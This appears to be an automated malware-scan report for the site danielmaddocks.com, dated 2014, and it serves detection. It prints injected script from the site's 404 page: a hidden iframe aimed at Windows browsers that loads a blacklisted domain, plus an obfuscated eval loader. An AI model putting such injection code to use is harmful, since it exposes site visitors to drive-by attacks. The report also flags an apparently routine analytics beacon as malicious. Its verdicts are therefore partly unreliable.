Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=danielmaddocks.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.danielmaddocks.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 11 Oct 2014 23:27:50 GMT Location: http://www.linkedin.com/in/danielmaddocks Server: Apache Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.linkedin.com/in/danielmaddocks | 200 OK Content-Length: 69166 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) YEvent.on(window,'load',function(){(function(){var protocol='http:';var d=new Image(1,1);d.onerror=d.onload=function(){d.onerror=d.onload=null;};d.src=[protocol,"//secure-us.imrworldwide.com/cgi-bin/m?ci=us-603751h&cg=0&cc=1&si=",escape(window.location.href),"&ts=compact&rnd=",(new Date()).getTime()].join('');})();}); Antivirus reports:
| ||
http://static.licdn.com:80/scds/common/u/lib/fizzy/fz-1.3.6-min.js | 200 OK Content-Length: 27495 Content-Type: text/javascript | clean |
http://s.c.lnkd.licdn.com/scds/concat/common/js?h=3nuvxgwg15rbghxm1gpzfbya2-35e6ug1j754avohmn1bzmucat-mv3v66b8q0h1hvgvd3yfjv5f-14k913qahq3mh0ac0lh0twk9v-dfoaudjrk6rbf82f45bz5crwi-62og8s54488owngg0s7escdit-c8ha6zrgpgcni7poa5ctye7il-djim7uyllidc9gta745y2wo5m-51dv6schthjydhvcv6rxvospp-d7z5zqt26qe7ht91f8494hqx5-e9rsfv7b5gx0bk0tln31dx3sq-2r5gveucqe4lsolc3n0oljsn1-8v2hz0euzy8m1tk5d6tfrn6j-b88qxy99s08xoe <span>...328 symbols skipped</span> | 200 OK Content-Length: 277120 Content-Type: text/javascript | clean |
http://s.c.lnkd.licdn.com/scds/concat/common/js?h=4zslye83akez5s4mf91hrq425-95d8d303rtd0n9wj4dcjbnh2c&fc=2 | 200 OK Content-Length: 2254 Content-Type: text/javascript | clean |
http://s.c.lnkd.licdn.com/scds/concat/common/js?h=d43qahhuvg0j5mlh4c2m9sipk-ew7wxbzv14lsc4vzkh2xrbzqn-dp1os5pzpoyifn8ljtjpfxrz-e17zy6z51dugr6fy4su92o7de-eq875keqggun9hoxzfhbanjes&fc=2 | 200 OK Content-Length: 17345 Content-Type: text/javascript | clean |
http://www.danielmaddocks.com/home?trk=hb_logo | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 11 Oct 2014 23:28:08 GMT Pragma: no-cache Location: http://danielmaddocks.com/home?trk=hb_logo Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://danielmaddocks.com/xmlrpc.php | clean |
http://danielmaddocks.com/home?trk=hb_logo | 404 Not Found Content-Length: 21706 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.shop-corp24.com ...[3405 bytes skipped]... >{ var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://www.shop-corp24.com'; js_kod2.width = '320px'; js_kod2.height = '250px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\ ...[16235 bytes skipped]... | ||
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/jquery-1.3.2.min.js | 200 OK Content-Length: 124997 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/jquery.form.js | 200 OK Content-Length: 32580 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/jquery.lightbox-0.5.min.js | 200 OK Content-Length: 10221 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/superfish.js | 200 OK Content-Length: 3848 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/custom.js | 200 OK Content-Length: 2776 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/cufon-yui.js | 200 OK Content-Length: 33753 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-content/themes/wisebusiness/js/Century_Gothic_400-Century_Gothic_700.font.js | 200 OK Content-Length: 237296 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://danielmaddocks.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: danielmaddocks.com
Result:
GET / HTTP/1.1
Host: danielmaddocks.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: danielmaddocks.com
Referer: http://www.google.com/search?q=danielmaddocks.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: danielmaddocks.com
Referer: http://www.google.com/search?q=danielmaddocks.com
Result:
The result is similar to the first query. There are no suspicious redirects found.